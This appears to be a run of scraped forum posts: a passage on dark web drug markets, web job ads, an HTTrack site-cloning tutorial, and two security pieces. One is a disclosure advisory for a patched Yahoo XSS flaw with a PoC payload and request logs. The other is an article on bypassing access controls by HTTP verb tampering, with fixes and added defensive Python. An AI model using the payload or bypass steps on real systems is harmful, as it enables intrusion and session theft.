      For a year starting in March of 2014, Evolution was the new and improved mecca of the Dark Web's underground economy. At its peak, Evolution had more than twice as many product listings as the Silk Road ever offered, including types of contraband Ulbricht never allowed on the Silk Road such as stolen financial information. And it somehow ran faster and stayed online far more reliably than its competitors. That criminal professionalism was in part the work of an experienced cybercriminal called Verto, Evolution's pseudonymous founder and the founder of the earlier Dark Web black market known as Tor Carder Forum, devoted to identity theft. Then in March of this year, Verto and Evolution co-founder Kimble abruptly shut down the site, taking with them millions of dollars of their users' bitcoins. A Department of Homeland Security investigation continues to search for the two Evolution administrators, revealed a subpoena sent to the "darknetmarkets" forum of Reddit seeking to identify Evolution staffers. But no arrests have been announced.

      Darkside
      For any Dark Web drug lord trying to avoid being the next Ross Ulbricht, step one is not to be in the United States. That's a lesson from Darkside, the creator of RAMP, the Russian Anonymous Marketplace. RAMP has survived three years online—longer than any other Dark Web drug market—by focusing exclusively on Russian clientele. "We never mess with the CIA, we work only for Russians and this keeps us safe," Darkside told WIRED in December of last year. "You can't rape the whole world and remain safe." Darkside, who uses an illustration of Edward Norton as his online avatar, said at the time of that interview that RAMP was continuing to earn him close to $250,000 a year in revenue, far less than the Silk Road but enough for Darkside to consider himself a "rich guy" in his local currency. And he offered another tip to avoid the kind of law enforcement crackdown that targeted the Dread Pirate Roberts: don't talk politics. In fact, all political discussion is banned on RAMP. "Politics always attract extra attention," Darkside wrote. "We do not want that." Source
  19. Location: University of Warwick, Coventry
Vacancy: Web Developer
Department: Warwick Business School
Salary: £38,511 - £45,954 per annum

Full Stack Web Developer wanted to join a small, high-performing team developing a mature e-learning infrastructure, also producing public-facing marketing sites and administrative web applications in support of teaching and operational excellence. You will be passionate about the user experience and be knowledgeable about web standards and best practice. You will have experience of creating intuitive, modern and aesthetically pleasing sites from scratch, which you will need to show us as part of your application. We value the ability to rapidly learn and adapt to new technologies above current skills and abilities although, as a guide, we are looking for skills in HTML, CSS, JavaScript, Bootstrap and jQuery alongside back-end technologies including Java, SQL and NoSQL datastores. It is essential that you can demonstrate experience of the full development lifecycle, from working alongside clients to establish requirements, through specification, project management and implementation to the testing, QA and acceptance of the finished product.

Details and online application - https://goo.gl/8xPQra
  20. Dear members,

First of all, apologies if this is posted in the wrong section.

We are urgently looking for highly professional web security analysts who wish to work by contract in our security company. You need to have comprehensive knowledge in researching exploitation of web security (e.g. PHP, Java etc.). If you wish to apply to this project, please provide us your CV. Also, companies can apply if they have staff who can work with us locally.

Regards,
M.
  21. Document Title:
===============
Yahoo eMarketing Bug Bounty #31 - Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1491

Yahoo Security ID (H1): #55395

Release Date:
=============
2015-05-07

Vulnerability Laboratory ID (VL-ID):
====================================
1491

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages`.

(Copy of the Vendor Homepage: http://www.yahoo.com )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the official Yahoo eMarketing online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-05-03: Vendor Notification (Yahoo Security Team - Bug Bounty Program)
2015-05-05: Vendor Response/Feedback (Yahoo Security Team - Bug Bounty Program)
2015-05-06: Vendor Fix/Patch (Yahoo Developer Team)
2015-05-06: Bug Bounty Reward (Yahoo Security Team - Bug Bounty Program)
2015-05-07: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A non-persistent input validation web vulnerability has been discovered in the official Yahoo eMarketing online service web-application. The security vulnerability allows remote attackers to manipulate client-side application-to-browser requests to compromise user/admin session information.

The vulnerability is located in the `id` value of the `eMarketing` module. Remote attackers are able to inject malicious script codes into client-side GET method application requests. Remote attackers are able to prepare specially crafted web-links to execute client-side script code that compromises the Yahoo user/admin session data. The execution of the script code occurs in the same module context location on a mouse-over. The attack vector of the vulnerability is located on the client-side of the online service and the request method to inject or execute the code is GET.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Yahoo > eMarketing

Vulnerable Parameter(s):
[+] id

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction (click). For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below to continue.

PoC Payload(s):
"onmouseenter="confirm(document.domain)

(https://marketing.tw.campaign.yahoo.net/)

PoC: eMarketing ID
<br/>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td align="right" width="10%" >
<div class="fb-like" style="overflow: hidden; " data-href="http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id="onmouseenter="confirm(document.domain)" data-layout="button_count" data-action="recommend" data-show-faces="false" data-share="true"></div>
</td>
<td align="left" valign="bottom" width="65%" >
<span style="font-size:12px; margin: 2px; font-weight:bold; color:#4d0079">?????????? ????????</span>
</td>
</tr>
</table>

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain)
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Headers:
Host[marketing.tw.campaign.yahoo.net]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005]
X-Forwarded-For[8.8.8.8]
Connection[keep-alive]
Response Headers:
Date[Wed, 06 May 2015 12:19:05 GMT]
Server[ATS]
X-Powered-By[PHP/5.3.27]
Content-Type[text/html]
Age[0]
Connection[close]
Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])]

Reference(s):
https://marketing.tw.campaign.yahoo.net
https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/
https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable id value in the emarketing service application of Yahoo. Restrict the input and disallow special chars or script code tags to prevent further injection attacks.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the tw Yahoo application is estimated as medium. (CVSS 3.3)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
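The fix the advisory recommends, a secure parse and encode of the reflected `id` value, worked through in Python as an added example (not Yahoo's code and not the advisory's PoC). It renders the fb-like div from the PoC twice, once with the raw request value concatenated into the data-href attribute and once with the value percent-encoded for the URL and entity-encoded for the attribute, then uses the standard-library HTML parser to list which attributes actually land on the div. `render_vulnerable`, `render_fixed`, `div_attributes` and `event_handlers` are this example's own names; the payload and base URL are the advisory's.

```python
"""Output encoding for the reflected `id` value described in the advisory.

Added example, not vendor code. Models the vulnerable template beside an
encoded one and checks the resulting attributes with html.parser.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Base URL from the advisory; the request's `id` value is appended to it.
BASE = ("http://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing"
        "/main/S04/B01?id=")


def render_vulnerable(id_value):
    """Raw concatenation, as the advisory's PoC shows the page doing."""
    return (f'<div class="fb-like" data-href="{BASE}{id_value}" '
            f'data-layout="button_count"></div>')


def render_fixed(id_value):
    """Encode for both contexts the value passes through: percent-encode it
    for the URL query string, then entity-encode the whole URL (quotes
    included) for the HTML attribute it sits in."""
    url = BASE + quote(id_value, safe="")
    return (f'<div class="fb-like" data-href="{html.escape(url, quote=True)}" '
            f'data-layout="button_count"></div>')


class _DivAttributes(HTMLParser):
    """Collect the attributes of the first <div>, tokenised the way a browser does."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "div" and self.attrs is None:
            self.attrs = dict(attrs)


def div_attributes(markup):
    """Attribute name -> value for the first <div> in the markup."""
    parser = _DivAttributes()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def event_handlers(markup):
    """Names of on* attributes that ended up on the <div>; should be empty."""
    return sorted(name for name in div_attributes(markup) if name.startswith("on"))


# The advisory's payload: closes data-href early and opens an event-handler attribute.
PAYLOAD = '"onmouseenter="confirm(document.domain)'

if __name__ == "__main__":
    print("vulnerable:", event_handlers(render_vulnerable(PAYLOAD)))  # ['onmouseenter']
    print("fixed:     ", event_handlers(render_fixed(PAYLOAD)))       # []
```

The point of parsing the output rather than eyeballing it is that the browser tokeniser, not the template author, decides where an attribute ends; the encoded version keeps the whole payload inside the data-href value, which is what the advisory's "restrict the input" advice alone cannot guarantee.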
  22. What is an HTTP VERB?

Hypertext Transfer Protocol (HTTP) gives you a list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in the development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, a high-severity vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server's HTTP TRACE method, is examined.

In HTTP methods, GET and POST are the most commonly used by developers to access information provided by a web server. HTTP allows several other, less well-known methods as well. Following are some of the methods:

HEAD
GET
POST
PUT
DELETE
TRACE
OPTIONS
CONNECT

Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete the web page on the server, and upload a web shell to the server, which leads to stealing the credentials of legitimate users. Moreover, when rooting the server, the methods that must be disabled are the following:

PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim's server as a file repository.
DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DoS) attack.
CONNECT: This method could allow a client to use the web server as a proxy.
TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes by developers. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which was discovered by Jeremiah Grossman.

If an application requires any one of the above mentioned methods, as in most cases REST web services may require the PUT or DELETE method, it is really important to check that their configuration/usage is properly limited to trusted users and a safe environment.

Many web environments allow verb based authentication and access control (VBAAC). This is basically nothing but a security control using HTTP methods such as GET and POST (usually used). Let's take an example to make you understand better.

JAVA EE web XML file:

<security-constraint>
  <web-resource-collection>
    <url-pattern>/auth/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>root</role-name>
  </auth-constraint>
</security-constraint>

In the above example, the rule limits the /auth directory to the root role only. However, this limitation can be bypassed using HTTP verb tampering even after limiting/restricting access to the mentioned role. As we can see, the above mentioned configuration has only restricted the same using the GET and POST methods. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well, such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass the same by sending arbitrary strings such as ASDF as an HTTP verb (method).

Following are some conditions where bypassing is possible:

It has GET functionality that is not idempotent or executes an arbitrary HTTP method
It uses a security control that lists HTTP verbs
The security control fails to block HTTP methods that are not listed

These are the most common scenarios where you can bypass the same. It also depends upon rule misconfiguration.

How we can bypass VBAAC with HTTP methods

Using the HEAD method

As mentioned above, the HEAD method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /Auth directory with GET and POST only.

http://httpsecure.org/auth/root.jsp?cmd=adduser

If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so it should be a GET or POST method that's stopped by the security constraint. If you use a browser proxy such as BurpSuite to intercept the request and craft it by changing the GET to a HEAD method, since the HEAD method is not listed in the security constraint the request will not be blocked. So the adduser function will be successfully invoked and you will get an empty response back in the browser due to HEAD functionality.

Using Arbitrary HTTP Verbs

Most platforms, such as PHP and JAVA EE, allow the use of arbitrary HTTP verbs. These methods execute similar to a GET request, which enables you to bypass the same. Most importantly, when using the arbitrary methods the response will not be stripped as it is for the HEAD method. You can see the internal pages easily. Using an arbitrary method instead of the HEAD method, the page source code can be viewed.

Some Vendors Allow HEAD Verbs

Many server vendors allow HEAD verbs by default, such as:

APACHE 2.2.8
JBOSS 4.2.2
WEBSPHERE 6.1
TOMCAT 6.0
IIS 6.0
WEBLOGIC 8.2

Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let's have a look at some of the most popular outdated application security mechanisms to see if we can use them to bypass VBAAC. Following are the servers which may get affected by VERB tampering techniques.

JAVA EE
Allow HTTP Verbs in Policy - YES
Bypassing Possible - YES
HEAD can be in policy - YES

.htaccess
Allow HTTP Verbs in Policy - YES
Bypassing Possible - YES (if not set)
HEAD can be in policy - YES

ASP.NET
Allow HTTP Verbs in Policy - YES
Bypassing Possible - YES (if not set)
HEAD can be in policy - YES

Java EE Containers

Let's consider the following security constraint policy:

<security-constraint>
  <display-name>Example Security Constraint Policy</display-name>
  <web-resource-collection>
    <web-resource-name>Protected Area</web-resource-name>
    <!-- Define the context-relative URL(s) to be protected -->
    <url-pattern>/auth/security/*</url-pattern>
    <!-- If you list http methods, only those methods are protected -->
    <http-method>POST</http-method>
    <http-method>PUT</http-method>
    <http-method>DELETE</http-method>
    <http-method>GET</http-method>
  </web-resource-collection>
  ...
</security-constraint>

In the above mentioned code, the listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list. The best way to implement this policy would be to block any method that is not listed, but that is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding an HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler.

The right approach to secure a JAVA EE application is to remove all the <http-method> elements from this policy, which simply applies this rule to all the HTTP methods, but if you still want to restrict access to a specific method, then you need to set up two policies as mentioned below.

<security-constraint>
  <web-resource-collection>
    <web-resource-name>site</web-resource-name>
    <url-pattern>/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  ...
</security-constraint>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>site</web-resource-name>
    <url-pattern>/*</url-pattern>
  </web-resource-collection>
  ...
</security-constraint>

So, the first policy denies GET requests access and the second policy denies all.

ASP.NET Authorization

Let's have a look at the ASP.NET authorization security mechanism configuration, which is vulnerable to bypass with VBAAC.

<authorization>
  <allow verbs="POST" users="joe"/>
  <allow verbs="GET" users="*"/>
  <deny verbs="POST" users="*"/>
</authorization>

In the above mentioned rule, the user JOE can only submit a POST request. In this example, this cannot be bypassed, the reason being GET methods are allowed to everyone. So, there is no security to bypass using the HEAD method.

<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="POST,GET" users="*" />
</authorization>

This one is vulnerable to bypass using the HEAD method. This is possible because .NET implicitly inserts an "allow all" rule into each authorization. After listing their role entitlements appropriately, append a "deny all" rule.

<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="*" users="*" />
</authorization>

This will ensure that the only requests that pass the authorization check are those that have a specific HTTP verb that is in the authorization rule.

Some points to remember

1) Always enable the deny all option
2) Configure your web and application server to disallow HEAD requests entirely

Thanks for reading

References
https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29
http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb-tampering

Source
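The two policy semantics the article describes, Java EE security constraints that protect only the verbs they list and ASP.NET authorization rules that fall through to an implicit allow-all, modelled in Python as an added example (not code from the original article, from OWASP, or from either platform). The web.xml and <authorization> fragments are the article's own, completed into well-formed documents with the deployment-descriptor namespace left out; `is_protected`, `audit_constraints`, `parse_authorization` and `aspnet_authorized` are this example's names, and the audit's probe verbs are the article's HEAD and arbitrary ASDF. It covers both the Java EE and the ASP.NET passages above.

```python
"""Models of the verb-based access controls (VBAAC) discussed in the article.

Added example, not vendor code. The Java EE and ASP.NET semantics follow the
article's description; samples are constructed from its fragments.
"""
import xml.etree.ElementTree as ET

# Constructed from the article's "listed methods only" policy (namespace omitted).
VULNERABLE_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/auth/security/*</url-pattern>
      <http-method>POST</http-method>
      <http-method>PUT</http-method>
      <http-method>DELETE</http-method>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>root</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Constructed from the article's two-policy fix: restrict GET, then cover every verb.
FIXED_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>site</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>root</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>site</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint/>
  </security-constraint>
</web-app>"""


def _pattern_matches(pattern, path):
    # Servlet url-pattern: "/prefix/*" is a path-prefix match, anything else is exact.
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    return path == pattern


def is_protected(web_xml, path, method):
    """Does any <security-constraint> apply to this request? A collection that
    lists <http-method> elements covers only those verbs; one without covers all."""
    for coll in ET.fromstring(web_xml).iter("web-resource-collection"):
        patterns = [p.text.strip() for p in coll.findall("url-pattern")]
        listed = {m.text.strip().upper() for m in coll.findall("http-method")}
        if any(_pattern_matches(p, path) for p in patterns):
            if not listed or method.upper() in listed:
                return True
    return False


# The article's two probe verbs: an unlisted standard one and an arbitrary string.
PROBE_VERBS = ("HEAD", "ASDF")


def audit_constraints(web_xml):
    """Audit helper (this example's own): every url-pattern that a probe verb
    reaches without any constraint applying, i.e. a verb-tampering gap."""
    patterns = {p.text.strip() for p in ET.fromstring(web_xml).iter("url-pattern")}
    findings = []
    for pattern in sorted(patterns):
        probe_path = pattern[:-1] + "probe" if pattern.endswith("/*") else pattern
        gaps = [v for v in PROBE_VERBS if not is_protected(web_xml, probe_path, v)]
        if gaps:
            findings.append((pattern, gaps))
    return findings


def parse_authorization(xml_text):
    """ASP.NET <authorization> rules in document order as (action, verbs, users);
    an omitted attribute means '*'."""
    rules = []
    for rule in ET.fromstring(xml_text):
        verbs = {v.strip().upper() for v in rule.get("verbs", "*").split(",")}
        users = {u.strip() for u in rule.get("users", "*").split(",")}
        rules.append((rule.tag, verbs, users))
    return rules


def aspnet_authorized(rules, user, method):
    """First matching rule wins. With no match, the implicit "allow all" the
    article describes applies, which is what lets an unlisted verb through."""
    for action, verbs, users in rules:
        if ("*" in verbs or method.upper() in verbs) and ("*" in users or user in users):
            return action == "allow"
    return True


# Constructed from the article's bypassable and fixed <authorization> examples.
BYPASSABLE_AUTHZ = """<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="POST,GET" users="*"/>
</authorization>"""

FIXED_AUTHZ = """<authorization>
  <allow verbs="GET" users="root"/>
  <allow verbs="POST" users="joe"/>
  <deny verbs="*" users="*"/>
</authorization>"""
```

To run the audit over a real deployment descriptor, the `http://xmlns.jcp.org/xml/ns/javaee` (or older `java.sun.com`) namespace has to be stripped or passed to the element lookups, and extension patterns such as `*.jsp` would need adding to `_pattern_matches`; the evaluation logic itself does not change.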
  23. Hello, after some time I decided to make a tutorial on how we can copy a website down to the smallest details.

Step 1: We start by downloading the program needed to clone any website. HTTrack is a program developed by a French team and, fortunately for us, it is distributed for free. Go to HTTrack.com and open the Downloads section, from where we download the newest version.

Step 2: We look for the site we want to clone. Because a few days ago I said in a YouTube video that I would clone a website belonging to cavaleria.ro (this is purely a demonstrative example), I will clone that one, so my target address will be Cavaleria.RO

Step 3: After downloading the program mentioned in the previous step, we install it the classic way: "Next > I accept > Next > ... > Finish"

Step 4: Open the program and notice that we are greeted by a start window. Click Next.

Step 5: We see that 3 boxes appear: Project name, Project category, Base path
Project name - fill it in with any name; I filled in "clonarecavaleria"
Project category - fill it in with any name; I filled in "p_clonarecavaleria"
Base path - the place where we want the clone of the website to be saved

Step 6: Fill in the Web Addresses field with the web page we want to clone.

Step 7: Click Next and then Finish and wait for the program to do its job (depending on the complexity of the site, cloning may take a while... of course, it also depends on the speed of your internet connection)

Step 8: After the site has been downloaded (when I chose the bluepanel, I stopped the cloning operation after 2-3 minutes because it was downloading every profile of every player, and it would have taken a good few hours)

Step 9: Go to C:\My Web Sites or the location you specified in step 5 and open the folder named after your Project name.

Step 10: Go into the cavaleria.ro folder (the folder named after the URL of the cloned site) and we can open it and see that the index.html file (like all the other files) is identical to that of the original site.

Observations and notes:
This was a purely demonstrative tutorial
This program is unable to copy the site's PHP code as well (i.e. the actual script part, the site's functionality)
This program is very useful if you want to copy the look of a site; it copies down to the smallest details.
The tutorial was created by me; it has also been posted on my blog!
If you don't understand something, leave a comment and I will answer.
Thank you for your time!
  24. Hi, I'm 17. I like programming and web design. Skills: Delphi, PHP, MySQL, Linux